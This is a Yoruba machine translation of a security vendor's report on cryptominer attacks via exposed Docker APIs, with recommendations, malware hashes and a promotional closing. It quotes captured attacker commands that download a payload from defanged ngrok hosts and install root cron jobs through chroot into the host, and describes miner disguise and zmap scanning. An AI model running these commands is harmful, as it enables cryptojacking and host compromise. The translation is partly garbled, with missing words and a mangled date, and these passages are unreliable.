A ṣe itupalẹ awọn data ti a gba ni lilo awọn apoti oyin, eyiti a ṣẹda lati tọpa awọn irokeke. Ati pe a rii iṣẹ ṣiṣe pataki lati aifẹ tabi awọn oniwakusa cryptocurrency ti a ko fun ni aṣẹ bi awọn apoti rogue nipa lilo aworan ti a tẹjade ni agbegbe lori Ipele Docker. Aworan naa ni a lo gẹgẹbi apakan ti iṣẹ kan ti o ngba awọn awakusa cryptocurrency irira.
Ni afikun, awọn eto fun ṣiṣẹ pẹlu awọn nẹtiwọọki ti fi sori ẹrọ lati wọ inu awọn apoti agbegbe ti o ṣii ati awọn ohun elo.
A fi awọn apoti oyin wa silẹ bi o ṣe jẹ, iyẹn ni, pẹlu awọn eto aiyipada, laisi eyikeyi awọn igbese aabo tabi fifi sori ẹrọ sọfitiwia atẹle. Jọwọ ṣe akiyesi pe Docker ni awọn iṣeduro fun iṣeto akọkọ lati yago fun awọn aṣiṣe ati awọn ailagbara ti o rọrun. Ṣugbọn awọn apoti oyin ti a lo jẹ awọn apoti, ti a ṣe apẹrẹ lati ṣe awari awọn ikọlu ti a pinnu si pẹpẹ apoti, kii ṣe awọn ohun elo inu awọn apoti.
Iṣẹ ṣiṣe irira ti a rii tun jẹ akiyesi nitori ko nilo awọn ailagbara ati pe o tun jẹ ominira ti ẹya Docker. Wiwa atunto ti ko tọ, ati nitorinaa ṣiṣi, aworan eiyan ni gbogbo ohun ti awọn ikọlu nilo lati ṣe akoran ọpọlọpọ awọn olupin ṣiṣi.
Docker API ti a ko tii gba olumulo laaye lati ṣe ọpọlọpọ ibiti o ti , pẹlu gbigba atokọ ti awọn apoti ti nṣiṣẹ, gbigba awọn akọọlẹ lati inu eiyan kan, bẹrẹ, idaduro (pẹlu fi agbara mu) ati paapaa ṣiṣẹda eiyan tuntun lati aworan kan pato pẹlu awọn eto pato.
Ni apa osi ni ọna ifijiṣẹ malware. Ni apa ọtun ni agbegbe ikọlu, eyiti o fun laaye lati yiyi awọn aworan latọna jijin.
Pipin nipasẹ orilẹ-ede ti 3762 ṣiṣi Docker APIs. Da lori wiwa Shodan ti ọjọ 12.02.2019/XNUMX/XNUMX
Attack pq ati payload awọn aṣayan
Iṣẹ irira ni a rii kii ṣe pẹlu iranlọwọ ti awọn ikoko oyin nikan. Awọn data lati Shodan fihan pe nọmba awọn API Docker ti o han (wo aworan keji) ti pọ si lati igba ti a ṣe iwadii eiyan ti a ko ṣeto ti a lo bi afara lati mu sọfitiwia iwakusa cryptocurrency Monero ṣiṣẹ. Ni Oṣu Kẹwa ọdun to kọja (2018, data lọwọlọwọ isunmọ. onitumọ) Awọn API ti o ṣi silẹ nikan ni 856.
Ayẹwo ti awọn iwe oyin ikoko fihan pe lilo aworan eiyan tun ni nkan ṣe pẹlu lilo , Ohun elo kan fun idasile awọn asopọ to ni aabo tabi gbigbe awọn ijabọ lati awọn aaye wiwọle si gbangba si awọn adirẹsi tabi awọn orisun ti o kan pato (fun apẹẹrẹ localhost). Eyi ngbanilaaye awọn ikọlu lati ṣẹda awọn URL ni agbara nigba jiṣẹ fifuye isanwo si olupin ṣiṣi. Ni isalẹ wa awọn apẹẹrẹ koodu lati awọn akọọlẹ ti n ṣafihan ilokulo ti iṣẹ ngrok:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Bi o ti le rii, awọn faili ti o gbejade ti wa ni igbasilẹ lati awọn URL iyipada nigbagbogbo. Awọn URL wọnyi ni ọjọ ipari kukuru, nitorinaa awọn ẹru isanwo ko le ṣe igbasilẹ lẹhin ọjọ ipari.
Àwọn àṣàyàn méjì ló wà fún ẹrù iṣẹ́. Èkíní ni ohun èlò ìwakùsà tí a kó jọ ní ìrísí ELF fún Linux (tí a mọ̀ sí Coinminer.SH.MALXMR.ATNO), èyí tí ó so mọ́ adágún ìwakùsà. Èkejì ni ìwé àfọwọ́kọ (TrojanSpy.SH.ZNETMAP.A), tí a ṣe láti gba àwọn irinṣẹ́ nẹ́tíwọ́ọ̀kì kan tí a lò láti ṣe àyẹ̀wò àwọn ibi tí nẹ́tíwọ́ọ̀kì wà àti láti wá àwọn ibi tí a fẹ́ fojú sí tuntun.
Iwe afọwọkọ dropper ṣeto awọn oniyipada meji, eyiti a lo lẹhinna lati ran miner cryptocurrency ṣiṣẹ. Oniyipada HOST ni URL nibiti awọn faili irira wa, ati oniyipada RIP ni orukọ faili (ni otitọ, hash) ti miner lati gbe lọ. Oniyipada HOST yipada ni gbogbo igba ti oniyipada hash ba yipada. Iwe afọwọkọ naa tun gbiyanju lati ṣayẹwo pe ko si awọn miners cryptocurrency miiran ti nṣiṣẹ lori olupin ti o kọlu.
Awọn apẹẹrẹ ti HOST ati awọn oniyipada RIP, bakanna bi snippet koodu kan ti a lo lati ṣayẹwo pe ko si awọn awakusa miiran ti nṣiṣẹ
Kí a tó bẹ̀rẹ̀ iṣẹ́ awakùsà náà, a yí orúkọ rẹ̀ padà sí nginx. Àwọn àtúnṣe mìíràn ti ìwé yìí yí orúkọ awakùsà náà padà sí àwọn iṣẹ́ tó tọ́ mìíràn tó lè wà ní àyíká. LinuxÈyí sábà máa ń tó láti yẹra fún àwọn àyẹ̀wò lórí àkójọ àwọn iṣẹ́ tí ń ṣiṣẹ́.
Iwe afọwọkọ wiwa tun ni awọn ẹya ara ẹrọ. O ṣiṣẹ pẹlu iṣẹ URL kanna lati ran awọn irinṣẹ pataki lọ. Lara wọn ni alakomeji zmap, eyiti o lo lati ṣe ọlọjẹ awọn nẹtiwọọki ati gba atokọ ti awọn ebute oko oju omi ṣiṣi. Iwe afọwọkọ naa tun gbe alakomeji miiran ti o lo lati ṣe ajọṣepọ pẹlu awọn iṣẹ ti a rii ati gba awọn asia lati ọdọ wọn lati pinnu alaye afikun nipa iṣẹ ti a rii (fun apẹẹrẹ, ẹya rẹ).
Iwe afọwọkọ naa tun ṣe ipinnu diẹ ninu awọn sakani nẹtiwọọki lati ṣe ọlọjẹ, ṣugbọn eyi da lori ẹya ti iwe afọwọkọ naa. O tun ṣeto awọn ebute oko oju omi lati awọn iṣẹ-ninu ọran yii, Docker-ṣaaju ṣiṣe ọlọjẹ naa.
Nígbà tí a bá rí àwọn ibi tí a lè fojú sí, a óò yọ àwọn àsíá kúrò lórí wọn láìfọwọ́sí. Ìwé àfọwọ́kọ náà tún máa ń ṣe àyẹ̀wò àwọn ibi tí a lè fojú sí ní ìbámu pẹ̀lú àwọn iṣẹ́, àwọn ohun èlò, àwọn ẹ̀yà ara, tàbí àwọn ìkànnì tí ó nífẹ̀ẹ́ sí: Redis, Jenkins, Drupal, MODX, , Docker 1.16 onibara ati Apache CouchDB. Ti olupin ti ṣayẹwo ba baamu eyikeyi ninu wọn, o ti fipamọ sinu faili ọrọ, eyiti awọn ikọlu le lo nigbamii fun itupalẹ atẹle ati gige sakasaka. Awọn faili ọrọ wọnyi jẹ ikojọpọ si olupin awọn ikọlu nipasẹ awọn ọna asopọ ti o ni agbara. Iyẹn ni, URL ọtọtọ ni a lo fun faili kọọkan, eyiti o tumọ si pe iraye si atẹle le nira.
Fekito ikọlu jẹ aworan Docker, bi a ṣe le rii ninu awọn ege koodu meji atẹle.
Ni oke ti wa ni lorukọmii si iṣẹ ti o tọ, ati ni isalẹ ni bii zmap ṣe lo lati ṣe ọlọjẹ awọn nẹtiwọọki
Ni oke ni awọn sakani nẹtiwọọki ti a ti sọ tẹlẹ, ni isalẹ wa awọn ebute oko oju omi kan pato fun wiwa awọn iṣẹ, pẹlu Docker
Sikirinifoto fihan pe aworan alpine-curl ti ṣe igbasilẹ diẹ sii ju awọn akoko 10 milionu lọ
Da lori Alpine Linux àti curl, irinṣẹ́ CLI tó ń ṣiṣẹ́ dáadáa fún gbígbé àwọn fáìlì lórí onírúurú ìlànà, ni a lè kó jọ. . Gẹgẹbi o ti le rii ninu aworan ti tẹlẹ, aworan yii ti ṣe igbasilẹ tẹlẹ diẹ sii ju awọn akoko miliọnu mẹwa 10 lọ. Nọmba nla ti awọn igbasilẹ le tumọ si lilo aworan yii bi aaye titẹsi; aworan yii ti ni imudojuiwọn diẹ sii ju oṣu mẹfa sẹhin; awọn olumulo ko ṣe igbasilẹ awọn aworan miiran lati ibi ipamọ yii nigbagbogbo. Ni Docker - eto awọn ilana ti a lo lati tunto eiyan kan lati ṣiṣẹ. Ti awọn eto aaye titẹ sii ko tọ (fun apẹẹrẹ, apoti naa ti wa ni ṣiṣi silẹ lati Intanẹẹti), aworan le ṣee lo bi ikọlu ikọlu. Awọn ikọlu le lo lati fi ẹru isanwo ranṣẹ ti wọn ba rii atunto aiṣedeede tabi apoti ṣiṣi silẹ ti ko ni atilẹyin.
O ṣe pataki lati ṣe akiyesi pe aworan yii (alpine-curl) funrararẹ kii ṣe irira, ṣugbọn bi o ti le rii loke, o le ṣee lo lati ṣe awọn iṣẹ irira. Awọn aworan Docker ti o jọra tun le ṣee lo lati ṣe awọn iṣẹ irira. A kan si Docker ati ṣiṣẹ pẹlu wọn lori ọran yii.
Awọn iṣeduro
ku fun ọpọlọpọ awọn ile-iṣẹ, paapaa awọn imuse , lojutu lori idagbasoke iyara ati ifijiṣẹ. Ohun gbogbo ti buru si nipasẹ iwulo lati ni ibamu pẹlu iṣatunṣe ati awọn ofin ibojuwo, iwulo lati ṣe atẹle aṣiri data, bakanna bi ibajẹ nla lati ibamu wọn. Ṣafikun adaṣe aabo sinu igbesi-aye idagbasoke kii ṣe iranlọwọ nikan fun ọ lati wa awọn iho aabo ti o le bibẹẹkọ lọ lairi, ṣugbọn o tun ṣe iranlọwọ fun ọ lati dinku iṣẹ ṣiṣe ti ko wulo, gẹgẹbi ṣiṣe awọn iṣelọpọ sọfitiwia afikun fun ailagbara awari kọọkan tabi aiṣedeede lẹhin ti o ti gbe ohun elo kan lọ.
Iṣẹlẹ ti a jiroro ninu nkan yii ṣe afihan iwulo lati ṣe akiyesi aabo lati ibẹrẹ, pẹlu awọn iṣeduro wọnyi:
- Fun awọn alabojuto eto ati awọn olupilẹṣẹ: Nigbagbogbo ṣayẹwo awọn eto API rẹ lati rii daju pe ohun gbogbo wa ni atunto lati gba awọn ibeere nikan lati ọdọ olupin kan tabi nẹtiwọọki inu.
- Tẹle ilana ti awọn ẹtọ ti o kere julọ: rii daju pe awọn aworan eiyan ti fowo si ati rii daju, fi opin si iraye si awọn paati pataki (iṣẹ ifilọlẹ apoti) ati ṣafikun fifi ẹnọ kọ nkan si awọn asopọ nẹtiwọọki.
- Tẹle ati ki o jeki aabo siseto, f.eks. ati-itumọ ti .
- Lo iṣayẹwo adaṣe adaṣe ti awọn akoko asiko ati awọn aworan lati gba alaye ni afikun nipa awọn ilana ti n ṣiṣẹ ninu apo eiyan (fun apẹẹrẹ, lati ṣawari rirọ tabi wa awọn ailagbara). Iṣakoso ohun elo ati ibojuwo iduroṣinṣin ṣe iranlọwọ lati tọpa awọn ayipada ajeji si awọn olupin, awọn faili, ati awọn agbegbe eto.
Trendmicro ṣe iranlọwọ fun awọn ẹgbẹ DevOps lati kọ ni aabo, yi jade ni iyara, ati ṣe ifilọlẹ nibikibi. Trend Micro Pese alagbara, ṣiṣan, ati aabo adaṣe kọja opo gigun ti epo DevOps ti agbari ati pese awọn aabo irokeke lọpọlọpọ lati daabobo awọn iṣẹ ṣiṣe ti ara, foju ati awọsanma ni akoko asiko. O tun ṣe afikun aabo eiyan pẹlu и , eyiti o ṣayẹwo awọn aworan apoti Docker fun malware ati awọn ailagbara ni aaye eyikeyi ninu opo gigun ti idagbasoke lati ṣe idiwọ awọn irokeke ṣaaju ki wọn to lọ.
Awọn ami adehun
Awọn hashes ti o jọmọ:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
Ni Awọn agbọrọsọ adaṣe ṣe afihan kini awọn eto ti o nilo lati ṣe ni akọkọ lati le dinku iṣeeṣe tabi yago fun iṣẹlẹ ti ipo ti ṣalaye loke. Ati ni Oṣu Kẹjọ ọjọ 19-21 ni aladanla lori ayelujara O le jiroro awọn wọnyi ati awọn iṣoro aabo ti o jọra pẹlu awọn ẹlẹgbẹ ati awọn olukọ adaṣe ni tabili yika, nibiti gbogbo eniyan le sọ jade ati tẹtisi awọn irora ati awọn aṣeyọri ti awọn ẹlẹgbẹ ti o ni iriri.
orisun: www.habr.com
